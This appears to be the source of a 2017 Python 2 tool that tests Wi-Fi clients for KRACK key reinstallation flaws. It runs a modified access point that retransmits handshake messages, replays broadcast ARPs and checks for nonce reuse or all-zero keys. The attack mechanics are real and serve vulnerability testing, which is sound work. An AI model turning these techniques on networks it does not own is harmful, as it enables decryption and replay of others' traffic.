krack-test-client.py 25 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524525526527528529530531532533534535536537538539540541542543544545546547548549550551552553554555556557558559560561562563564565566567568569570571572573574575576577578579580581582583584585586587588589590591592593594595596597598599600601602603604605606607608609
  1. #!/usr/bin/env python2
  2. # Tests for key reinstallation vulnerabilities in Wi-Fi clients
  3. # Copyright (c) 2017, Mathy Vanhoef <Mathy.Vanhoef@cs.kuleuven.be>
  4. #
  5. # This code may be distributed under the terms of the BSD license.
  6. # See README for more details.
  7. import logging
  8. logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
  9. from scapy.all import *
  10. import libwifi
  11. from libwifi import *
  12. import sys, socket, struct, time, subprocess, atexit, select, os.path
  13. from wpaspy import Ctrl
  14. # TODOs:
  15. # - Always mention 4-way handshake attack test (normal, tptk, tptk-rand)
  16. # - Stop testing a client even when we think it's patched?
  17. # - The --gtkinit with the 4-way handshake is very sensitive to packet loss
  18. # - Add an option to test replays of unicast traffic
  19. # Futute work:
  20. # - If the client installs an all-zero key, we cannot reliably test the group key handshake
  21. # - Automatically execute all relevant tests in order
  22. # - Force client to request a new IP address when connecting
  23. # - More reliable group key reinstall test: install very high RSC, then install a zero one.
  24. # This avoids constantly having to execute a new 4-way handshake for example.
  25. # After how many seconds a new message 3, or new group key message 1, is sent.
  26. HANDSHAKE_TRANSMIT_INTERVAL = 2
  27. #### Utility Commands ####
  28. def hostapd_clear_messages(hostapd_ctrl):
  29. # Clear old replies and messages from the hostapd control interface
  30. while hostapd_ctrl.pending():
  31. hostapd_ctrl.recv()
  32. def hostapd_command(hostapd_ctrl, cmd):
  33. hostapd_clear_messages(hostapd_ctrl)
  34. rval = hostapd_ctrl.request(cmd)
  35. if "UNKNOWN COMMAND" in rval:
  36. log(ERROR, "Hostapd did not recognize the command %s. Did you (re)compile hostapd?" % cmd.split()[0])
  37. quit(1)
  38. elif "FAIL" in rval:
  39. log(ERROR, "Failed to execute command %s" % cmd)
  40. quit(1)
  41. return rval
  42. #### Main Testing Code ####
  43. class TestOptions():
  44. ReplayBroadcast, ReplayUnicast, Fourway, Grouphs = range(4)
  45. TptkNone, TptkReplay, TptkRand = range(3)
  46. def __init__(self, variant=Fourway):
  47. self.variant = variant
  48. # Additional options for Fourway tests
  49. self.tptk = TestOptions.TptkNone
  50. # Extra option for Fourway and Grouphs tests
  51. self.gtkinit = False
  52. class ClientState():
  53. UNKNOWN, VULNERABLE, PATCHED = range(3)
  54. IDLE, STARTED, GOT_CANARY, FINISHED = range(4)
  55. def __init__(self, clientmac, options):
  56. self.mac = clientmac
  57. self.options = options
  58. self.TK = None
  59. self.vuln_4way = ClientState.UNKNOWN
  60. self.vuln_bcast = ClientState.UNKNOWN
  61. self.ivs = IvCollection()
  62. self.pairkey_sent_time_prev_iv = None
  63. self.pairkey_intervals_no_iv_reuse = 0
  64. self.broadcast_reset()
  65. def broadcast_reset(self):
  66. self.broadcast_state = ClientState.IDLE
  67. self.broadcast_prev_canary_time = 0
  68. self.broadcast_num_canaries_received = -1 # -1 because the first broadcast ARP requests are still valid
  69. self.broadcast_requests_sent = -1 # -1 because the first broadcast ARP requests are still valid
  70. self.broadcast_patched_intervals = 0
  71. # TODO: Put in libwifi?
  72. def get_encryption_key(self, hostapd_ctrl):
  73. if self.TK is None:
  74. # Contact our modified Hostapd instance to request the pairwise key
  75. response = hostapd_command(hostapd_ctrl, "GET_TK " + self.mac)
  76. if not "FAIL" in response:
  77. self.TK = response.strip().decode("hex")
  78. return self.TK
  79. # TODO: Put in libwifi?
  80. def decrypt(self, p, hostapd_ctrl):
  81. payload = get_ccmp_payload(p)
  82. llcsnap, packet = payload[:8], payload[8:]
  83. if payload.startswith("\xAA\xAA\x03\x00\x00\x00"):
  84. # On some kernels, the virtual interface associated to the real AP interface will return
  85. # frames where the payload is already decrypted (this happens when hardware decryption is
  86. # used). So if the payload seems decrypted, just extract the full plaintext from the frame.
  87. plaintext = payload
  88. else:
  89. key = self.get_encryption_key(hostapd_ctrl)
  90. plaintext = decrypt_ccmp(p, key)
  91. # If it still fails, try an all-zero key
  92. if not plaintext.startswith("\xAA\xAA\x03\x00\x00\x00"):
  93. plaintext = decrypt_ccmp(p, "\x00" * 16)
  94. return plaintext
  95. def track_used_iv(self, p):
  96. return self.ivs.track_used_iv(p)
  97. def is_iv_reused(self, p):
  98. return self.ivs.is_iv_reused(p)
  99. def check_pairwise_reinstall(self, p):
  100. """Inspect whether the IV is reused, or whether the client seem to be patched"""
  101. # If this is gaurenteed IV reuse (and not just a benign retransmission), mark the client as vulnerable
  102. if self.ivs.is_iv_reused(p):
  103. if self.vuln_4way != ClientState.VULNERABLE:
  104. iv = dot11_get_iv(p)
  105. seq = dot11_get_seqnum(p)
  106. log(WARNING, ("%s: IV reuse detected (IV=%d, seq=%d). " +
  107. "Client reinstalls the pairwise key in the 4-way handshake (this is bad)") % (self.mac, iv, seq))
  108. self.vuln_4way = ClientState.VULNERABLE
  109. # If it's a higher IV than all previous ones, try to check if the client seems patched
  110. elif self.vuln_4way == ClientState.UNKNOWN and self.ivs.is_new_iv(p):
  111. # Save how many intervals we received a data packet without IV reset. Use twice the
  112. # transmission interval of message 3, in case one message 3 is lost due to noise.
  113. if self.pairkey_sent_time_prev_iv is None:
  114. self.pairkey_sent_time_prev_iv = p.time
  115. elif self.pairkey_sent_time_prev_iv + 2 * HANDSHAKE_TRANSMIT_INTERVAL + 1 <= p.time:
  116. self.pairkey_intervals_no_iv_reuse += 1
  117. self.pairkey_sent_time_prev_iv = p.time
  118. log(DEBUG, "%s: no pairwise IV resets seem to have occured for one interval" % self.mac)
  119. # If during several intervals all IV reset attempts failed, the client is likely patched.
  120. # We wait for enough such intervals to occur, to avoid getting a wrong result.
  121. if self.pairkey_intervals_no_iv_reuse >= 5 and self.vuln_4way == ClientState.UNKNOWN:
  122. self.vuln_4way = ClientState.PATCHED
  123. # Be sure to clarify *which* type of attack failed (to remind user to test others attacks as well)
  124. msg = "%s: client DOESN'T reinstall the pairwise key in the 4-way handshake (this is good)"
  125. if self.options.tptk == TestOptions.TptkNone:
  126. msg += " (used standard attack)"
  127. elif self.options.tptk == TestOptions.TptkReplay:
  128. msg += " (used TPTK attack)"
  129. elif self.options.tptk == TestOptions.TptkRand:
  130. msg += " (used TPTK-RAND attack)"
  131. log(INFO, (msg + ".") % self.mac, color="green")
  132. def mark_allzero_key(self, p):
  133. if self.vuln_4way != ClientState.VULNERABLE:
  134. iv = dot11_get_iv(p)
  135. seq = dot11_get_seqnum(p)
  136. log(WARNING, ("%s: usage of all-zero key detected (IV=%d, seq=%d). " +
  137. "Client (re)installs an all-zero key in the 4-way handshake (this is very bad).") % (self.mac, iv, seq))
  138. log(WARNING, "%s: !!! Other tests are unreliable due to all-zero key usage, please fix this vulnerability first !!!" % self.mac, color="red")
  139. self.vuln_4way = ClientState.VULNERABLE
  140. def broadcast_print_patched(self):
  141. if self.options.variant in [TestOptions.Fourway, TestOptions.Grouphs]:
  142. # TODO: Mention which variant of the 4-way handshake test was used
  143. hstype = "group key" if self.options.variant == TestOptions.Grouphs else "4-way"
  144. if self.options.gtkinit:
  145. log(INFO, "%s: Client installs the group key in the %s handshake with the given replay counter (this is good)" % (self.mac, hstype), color="green")
  146. else:
  147. log(INFO, "%s: Client DOESN'T reinstall the group key in the %s handshake (this is good)" % (self.mac, hstype), color="green")
  148. if self.options.variant == TestOptions.ReplayBroadcast:
  149. log(INFO, "%s: Client DOESN'T accept replayed broadcast frames (this is good)" % self.mac, color="green")
  150. def broadcast_print_vulnerable(self):
  151. if self.options.variant in [TestOptions.Fourway, TestOptions.Grouphs]:
  152. hstype = "group key" if self.options.variant == TestOptions.Grouphs else "4-way"
  153. if self.options.gtkinit:
  154. log(WARNING, "%s: Client always installs the group key in the %s handshake with a zero replay counter (this is bad)." % (self.mac, hstype))
  155. else:
  156. log(WARNING, "%s: Client reinstalls the group key in the %s handshake (this is bad)." % (self.mac, hstype))
  157. log(WARNING, " Or client accepts replayed broadcast frames (see --replay-broadcast).")
  158. if self.options.variant == TestOptions.ReplayBroadcast:
  159. log(WARNING, "%s: Client accepts replayed broadcast frames (this is bad)." % self.mac)
  160. log(WARNING, " Fix this before testing for group key (re)installations!")
  161. def broadcast_process_reply(self, p):
  162. """Handle replies to the replayed ARP broadcast request (which reuses an IV)"""
  163. # Must be testing this client, and must not be a benign retransmission
  164. if not self.broadcast_state in [ClientState.STARTED, ClientState.GOT_CANARY]: return
  165. if self.broadcast_prev_canary_time + 1 > p.time: return
  166. self.broadcast_num_canaries_received += 1
  167. log(DEBUG, "%s: received %d replies to the replayed broadcast ARP requests" % (self.mac, self.broadcast_num_canaries_received))
  168. # We wait for several replies before marking the client as vulnerable, because
  169. # the first few broadcast ARP requests still use a valid (not yet used) IV.
  170. if self.broadcast_num_canaries_received >= 5:
  171. assert self.vuln_bcast != ClientState.VULNERABLE
  172. self.vuln_bcast = ClientState.VULNERABLE
  173. self.broadcast_state = ClientState.FINISHED
  174. self.broadcast_print_vulnerable()
  175. # Remember that we got a reply this interval (see broadcast_check_replies to detect patched clients)
  176. else:
  177. self.broadcast_state = ClientState.GOT_CANARY
  178. self.broadcast_prev_canary_time = p.time
  179. def broadcast_check_replies(self):
  180. """Track when we send broadcast ARP requests, and determine if a client seems patched"""
  181. if self.broadcast_state == ClientState.IDLE:
  182. return
  183. if self.broadcast_requests_sent == 4:
  184. # We sent four broadcast ARP requests, and got at least one got a reply. This indicates the client is vulnerable.
  185. if self.broadcast_state == ClientState.GOT_CANARY:
  186. log(DEBUG, "%s: got a reply to broadcast ARPs during this interval" % self.mac)
  187. self.broadcast_state = ClientState.STARTED
  188. # We sent four broadcast ARP requests, and didn't get a reply to any. This indicates the client is patched.
  189. elif self.broadcast_state == ClientState.STARTED:
  190. self.broadcast_patched_intervals += 1
  191. log(DEBUG, "%s: didn't get reply received to broadcast ARPs during this interval" % self.mac)
  192. self.broadcast_state = ClientState.STARTED
  193. self.broadcast_requests_sent = 0
  194. # If the client appears secure for several intervals (see above), it's likely patched
  195. if self.broadcast_patched_intervals >= 5 and self.vuln_bcast == ClientState.UNKNOWN:
  196. self.vuln_bcast = ClientState.PATCHED
  197. self.broadcast_state = ClientState.FINISHED
  198. self.broadcast_print_patched()
  199. class KRAckAttackClient():
  200. def __init__(self):
  201. # Parse hostapd.conf
  202. self.script_path = os.path.dirname(os.path.realpath(__file__))
  203. try:
  204. interface = hostapd_read_config(os.path.join(self.script_path, "hostapd.conf"))
  205. except Exception as ex:
  206. log(ERROR, "Failed to parse the hostapd.conf config file")
  207. raise
  208. if not interface:
  209. log(ERROR, 'Failed to determine wireless interface. Specify one in hostapd.conf at the line "interface=NAME".')
  210. quit(1)
  211. # Set other variables
  212. self.nic_iface = interface
  213. self.nic_mon = interface + "mon"
  214. self.options = None
  215. try:
  216. self.apmac = scapy.arch.get_if_hwaddr(interface)
  217. except:
  218. log(ERROR, 'Failed to get MAC address of %s. Specify an existing interface in hostapd.conf at the line "interface=NAME".' % interface)
  219. raise
  220. self.sock_mon = None
  221. self.sock_eth = None
  222. self.hostapd = None
  223. self.hostapd_ctrl = None
  224. self.dhcp = None
  225. self.broadcast_sender_ip = None
  226. self.broadcast_arp_sock = None
  227. self.clients = dict()
  228. def reset_client_info(self, clientmac):
  229. if clientmac in self.dhcp.leases:
  230. self.dhcp.remove_client(clientmac)
  231. log(DEBUG, "%s: Removing client from DHCP leases" % clientmac)
  232. if clientmac in self.clients:
  233. del self.clients[clientmac]
  234. log(DEBUG, "%s: Removing ClientState object" % clientmac)
  235. def handle_replay(self, p):
  236. """Replayed frames (caused by a pairwise key reinstallation) are rejected by the kernel. This
  237. function processes these frames manually so we can still test reinstallations of the group key."""
  238. if not Dot11WEP in p: return
  239. # Reconstruct Ethernet header
  240. clientmac = p.addr2
  241. header = Ether(dst=self.apmac, src=clientmac)
  242. header.time = p.time
  243. # Decrypt the payload and obtain LLC/SNAP header and packet content
  244. client = self.clients[clientmac]
  245. plaintext = client.decrypt(p, self.hostapd_ctrl)
  246. llcsnap, packet = plaintext[:8], plaintext[8:]
  247. # Rebuild the full Ethernet packet
  248. if llcsnap == "\xAA\xAA\x03\x00\x00\x00\x08\x06":
  249. decap = header/ARP(packet)
  250. elif llcsnap == "\xAA\xAA\x03\x00\x00\x00\x08\x00":
  251. decap = header/IP(packet)
  252. elif llcsnap == "\xAA\xAA\x03\x00\x00\x00\x86\xdd":
  253. decap = header/IPv6(packet)
  254. #elif llcsnap == "\xAA\xAA\x03\x00\x00\x00\x88\x8e":
  255. # # EAPOL
  256. else:
  257. return
  258. # Now process the packet as if it were a valid (non-replayed) one
  259. self.process_eth_rx(decap)
  260. def handle_mon_rx(self):
  261. p = self.sock_mon.recv()
  262. if p == None: return
  263. if p.type == 1: return
  264. # Note: we cannot verify that the NIC is indeed reusing IVs when sending the broadcast
  265. # ARP requests, because it may override them in the firmware/hardware (some Atheros
  266. # Wi-Fi NICs do no properly reset the Tx group key IV when using hardware encryption).
  267. # The first bit in FCfield is set if the frames is "to-DS"
  268. clientmac, apmac = (p.addr1, p.addr2) if (p.FCfield & 2) != 0 else (p.addr2, p.addr1)
  269. if apmac != self.apmac: return None
  270. # Reset info about disconnected clients
  271. if Dot11Deauth in p or Dot11Disas in p:
  272. self.reset_client_info(clientmac)
  273. # Inspect encrypt frames for IV reuse & handle replayed frames rejected by the kernel
  274. elif p.addr1 == self.apmac and Dot11WEP in p:
  275. if not clientmac in self.clients:
  276. self.clients[clientmac] = ClientState(clientmac, options=options)
  277. client = self.clients[clientmac]
  278. iv = dot11_get_iv(p)
  279. log(DEBUG, "%s: transmitted data using IV=%d (seq=%d)" % (clientmac, iv, dot11_get_seqnum(p)))
  280. if decrypt_ccmp(p, "\x00" * 16).startswith("\xAA\xAA\x03\x00\x00\x00"):
  281. client.mark_allzero_key(p)
  282. if self.options.variant == TestOptions.Fourway and not self.options.gtkinit:
  283. client.check_pairwise_reinstall(p)
  284. if client.is_iv_reused(p):
  285. self.handle_replay(p)
  286. client.track_used_iv(p)
  287. def process_eth_rx(self, p):
  288. self.dhcp.reply(p)
  289. self.broadcast_arp_sock.reply(p)
  290. clientmac = p[Ether].src
  291. if not clientmac in self.clients: return
  292. client = self.clients[clientmac]
  293. if ARP in p and p[ARP].pdst == self.broadcast_sender_ip:
  294. client.broadcast_process_reply(p)
  295. def handle_eth_rx(self):
  296. p = self.sock_eth.recv()
  297. if p == None or not Ether in p: return
  298. self.process_eth_rx(p)
  299. def broadcast_send_request(self, client):
  300. clientip = self.dhcp.leases[client.mac]
  301. # Print a message when we start testing the client --- XXX this should be in the client?
  302. if client.broadcast_state == ClientState.IDLE:
  303. hstype = "group key" if self.options.variant == TestOptions.Grouphs else "4-way"
  304. log(STATUS, "%s: client has IP address -> now sending replayed broadcast ARP packets" % client.mac)
  305. client.broadcast_state = ClientState.STARTED
  306. # Send a new handshake message when testing the group key handshake
  307. if self.options.variant == TestOptions.Grouphs:
  308. cmd = "RESEND_GROUP_M1 " + client.mac
  309. cmd += "maxrsc" if self.options.gtkinit else ""
  310. hostapd_command(self.hostapd_ctrl, cmd)
  311. # Send a replayed broadcast ARP request to the client
  312. request = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, hwsrc=self.apmac, psrc=self.broadcast_sender_ip, pdst=clientip)
  313. self.sock_eth.send(request)
  314. client.broadcast_requests_sent += 1
  315. log(INFO, "%s: sending broadcast ARP to %s from %s (sent %d ARPs this interval)" % (client.mac,
  316. clientip, self.broadcast_sender_ip, client.broadcast_requests_sent))
  317. def experimental_test_igtk_installation(self):
  318. """To test if the IGTK is installed using the given replay counter"""
  319. # 1. Set ieee80211w=2 in hostapd.conf
  320. # 2. Run this script using --gtkinit so a new group key is generated before calling this function
  321. # 3. Install the new IGTK using a very high given replay counter
  322. hostapd_command(self.hostapd_ctrl, "RESEND_GROUP_M1 %s maxrsc" % client.mac)
  323. time.sleep(1)
  324. # 4. Now kill the AP
  325. quit(1)
  326. # 5. Hostapd sends a broadcast deauth message. At least iOS will reply using its own
  327. # deauthentication respose if this frame is accepted. Sometimes hostapd doesn't
  328. # send a broadcast deauthentication. Is this when the client is sleeping?
  329. def configure_interfaces(self):
  330. log(STATUS, "Note: disable Wi-Fi in network manager & disable hardware encryption. Both may interfere with this script.")
  331. # 0. Some users may forget this otherwise
  332. subprocess.check_output(["rfkill", "unblock", "wifi"])
  333. # 1. Remove unused virtual interfaces to start from a clean state
  334. subprocess.call(["iw", self.nic_mon, "del"], stdout=subprocess.PIPE, stdin=subprocess.PIPE)
  335. # 2. Configure monitor mode on interfaces
  336. subprocess.check_output(["iw", self.nic_iface, "interface", "add", self.nic_mon, "type", "monitor"])
  337. # Some kernels (Debian jessie - 3.16.0-4-amd64) don't properly add the monitor interface. The following ugly
  338. # sequence of commands assures the virtual interface is properly registered as a 802.11 monitor interface.
  339. subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
  340. time.sleep(0.5)
  341. subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
  342. subprocess.check_output(["ifconfig", self.nic_mon, "up"])
  343. def run(self, options):
  344. self.options = options
  345. self.configure_interfaces()
  346. # Open the patched hostapd instance that carries out tests and let it start
  347. log(STATUS, "Starting hostapd ...")
  348. try:
  349. self.hostapd = subprocess.Popen([
  350. os.path.join(self.script_path, "../hostapd/hostapd"),
  351. os.path.join(self.script_path, "hostapd.conf")]
  352. + sys.argv[1:])
  353. except:
  354. if not os.path.exists("../hostapd/hostapd"):
  355. log(ERROR, "hostapd executable not found. Did you compile hostapd? Use --help param for more info.")
  356. raise
  357. time.sleep(1)
  358. try:
  359. self.hostapd_ctrl = Ctrl("hostapd_ctrl/" + self.nic_iface)
  360. self.hostapd_ctrl.attach()
  361. except:
  362. log(ERROR, "It seems hostapd did not start properly, please inspect its output.")
  363. log(ERROR, "Did you disable Wi-Fi in the network manager? Otherwise hostapd won't work.")
  364. raise
  365. self.sock_mon = MitmSocket(type=ETH_P_ALL, iface=self.nic_mon)
  366. self.sock_eth = L2Socket(type=ETH_P_ALL, iface=self.nic_iface)
  367. # Let scapy handle DHCP requests
  368. self.dhcp = DHCP_sock(sock=self.sock_eth,
  369. domain='krackattack.com',
  370. pool=Net('192.168.100.0/24'),
  371. network='192.168.100.0/24',
  372. gw='192.168.100.254',
  373. renewal_time=600, lease_time=3600)
  374. # Configure gateway IP: reply to ARP and ping requests
  375. subprocess.check_output(["ifconfig", self.nic_iface, "192.168.100.254"])
  376. # Use a dedicated IP address for our broadcast ARP requests and replies
  377. self.broadcast_sender_ip = self.dhcp.pool.pop()
  378. self.broadcast_arp_sock = ARP_sock(sock=self.sock_eth, IP_addr=self.broadcast_sender_ip, ARP_addr=self.apmac)
  379. log(STATUS, "Ready. Connect to this Access Point to start the tests. Make sure the client requests an IP using DHCP!", color="green")
  380. # Monitor both the normal interface and virtual monitor interface of the AP
  381. self.next_arp = time.time() + 1
  382. while True:
  383. sel = select.select([self.sock_mon, self.sock_eth], [], [], 1)
  384. if self.sock_mon in sel[0]: self.handle_mon_rx()
  385. if self.sock_eth in sel[0]: self.handle_eth_rx()
  386. # Periodically send the replayed broadcast ARP requests to test for group key reinstallations
  387. if time.time() > self.next_arp:
  388. # When testing if the replay counter of the group key is properly installed, always install
  389. # a new group key. Otherwise KRACK patches might interfere with this test.
  390. # Otherwise just reset the replay counter of the current group key.
  391. if self.options.variant in [TestOptions.Fourway, TestOptions.Grouphs] and self.options.gtkinit:
  392. hostapd_command(self.hostapd_ctrl, "RENEW_GTK")
  393. else:
  394. hostapd_command(self.hostapd_ctrl, "RESET_PN FF:FF:FF:FF:FF:FF")
  395. self.next_arp = time.time() + HANDSHAKE_TRANSMIT_INTERVAL
  396. for client in self.clients.values():
  397. #self.experimental_test_igtk_installation()
  398. # 1. Test the 4-way handshake
  399. if self.options.variant == TestOptions.Fourway and self.options.gtkinit and client.vuln_bcast != ClientState.VULNERABLE:
  400. # Execute a new handshake to test stations that don't accept a retransmitted message 3
  401. hostapd_command(self.hostapd_ctrl, "RENEW_PTK " + client.mac)
  402. # TODO: wait untill 4-way handshake completed? And detect failures (it's sensitive to frame losses)?
  403. elif self.options.variant == TestOptions.Fourway and not self.options.gtkinit and client.vuln_4way != ClientState.VULNERABLE:
  404. # First inject a message 1 if requested using the TPTK option
  405. if self.options.tptk == TestOptions.TptkReplay:
  406. hostapd_command(self.hostapd_ctrl, "RESEND_M1 " + client.mac)
  407. elif self.options.tptk == TestOptions.TptkRand:
  408. hostapd_command(self.hostapd_ctrl, "RESEND_M1 " + client.mac + " change-anonce")
  409. # Note that we rely on an encrypted message 4 as reply to detect pairwise key reinstallations reinstallations.
  410. hostapd_command(self.hostapd_ctrl, "RESEND_M3 " + client.mac + ("maxrsc" if self.options.gtkinit else ""))
  411. # 2. Test if broadcast ARP request are accepted by the client. Keep injecting even
  412. # to PATCHED clients (just to be sure they keep rejecting replayed frames).
  413. if self.options.variant in [TestOptions.Fourway, TestOptions.Grouphs, TestOptions.ReplayBroadcast]:
  414. # 2a. Check if we got replies to previous requests (and determine if vulnerable)
  415. client.broadcast_check_replies()
  416. # 2b. Send new broadcast ARP requests (and handshake messages if needed)
  417. if client.vuln_bcast != ClientState.VULNERABLE and client.mac in self.dhcp.leases:
  418. self.broadcast_send_request(client)
  419. def stop(self):
  420. log(STATUS, "Closing hostapd and cleaning up ...")
  421. if self.hostapd:
  422. self.hostapd.terminate()
  423. self.hostapd.wait()
  424. if self.sock_mon: self.sock_mon.close()
  425. if self.sock_eth: self.sock_eth.close()
  426. def cleanup():
  427. attack.stop()
  428. def argv_get_interface():
  429. for i in range(len(sys.argv)):
  430. if not sys.argv[i].startswith("-i"):
  431. continue
  432. if len(sys.argv[i]) > 2:
  433. return sys.argv[i][2:]
  434. else:
  435. return sys.argv[i + 1]
  436. return None
  437. def argv_pop_argument(argument):
  438. if not argument in sys.argv: return False
  439. idx = sys.argv.index(argument)
  440. del sys.argv[idx]
  441. return True
  442. def hostapd_read_config(config):
  443. # Read the config, get the interface name, and verify some settings.
  444. interface = None
  445. with open(config) as fp:
  446. for line in fp.readlines():
  447. line = line.strip()
  448. if line.startswith("interface="):
  449. interface = line.split('=')[1]
  450. elif line.startswith("wpa_pairwise=") or line.startswith("rsn_pairwise"):
  451. if "TKIP" in line:
  452. log(ERROR, "ERROR: We only support tests using CCMP. Only include CCMP in %s config at the following line:" % config)
  453. log(ERROR, " >%s<" % line, showtime=False)
  454. quit(1)
  455. # Parameter -i overrides interface in config.
  456. # FIXME: Display warning when multiple interfaces are used.
  457. if argv_get_interface() is not None:
  458. interface = argv_get_interface()
  459. return interface
  460. if __name__ == "__main__":
  461. if "--help" in sys.argv or "-h" in sys.argv:
  462. print "\nSee README.md for usage instructions. Accepted parameters are"
  463. print "\n\t" + "\n\t".join(["--replay-broadcast", "--group", "--tptk", "--tptk-rand", "--gtkinit", "--debug"]) + "\n"
  464. quit(1)
  465. options = TestOptions()
  466. # Parse the type of test variant to execute
  467. replay_broadcast = argv_pop_argument("--replay-broadcast")
  468. replay_unicast = argv_pop_argument("--replay-unicast")
  469. groupkey = argv_pop_argument("--group")
  470. fourway = argv_pop_argument("--fourway")
  471. if replay_broadcast + replay_unicast + fourway + groupkey > 1:
  472. print "You can only select one argument of out replay-broadcast, replay-unicast, fourway, and group"
  473. quit(1)
  474. if replay_broadcast:
  475. options.variant = TestOptions.ReplayBroadcast
  476. elif replay_unicast:
  477. options.variant = TestOptions.ReplayUnicast
  478. elif groupkey:
  479. options.variant = TestOptions.Grouphs
  480. else:
  481. options.variant = TestOptions.Fourway
  482. # Parse options for the 4-way handshake
  483. tptk = argv_pop_argument("--tptk")
  484. tptk_rand = argv_pop_argument("--tptk-rand")
  485. if tptk + tptk_rand > 1:
  486. print "You can only select one argument of out tptk and tptk-rand"
  487. quit(1)
  488. if tptk:
  489. options.tptk = TestOptions.TptkReplay
  490. elif tptk_rand:
  491. options.tptk = TestOptions.TptkRand
  492. else:
  493. options.tptk = TestOptions.TptkNone
  494. # Parse remaining options
  495. options.gtkinit = argv_pop_argument("--gtkinit")
  496. while argv_pop_argument("--debug"):
  497. libwifi.global_log_level -= 1
  498. # Now start the tests
  499. attack = KRAckAttackClient()
  500. atexit.register(cleanup)
  501. attack.run(options=options)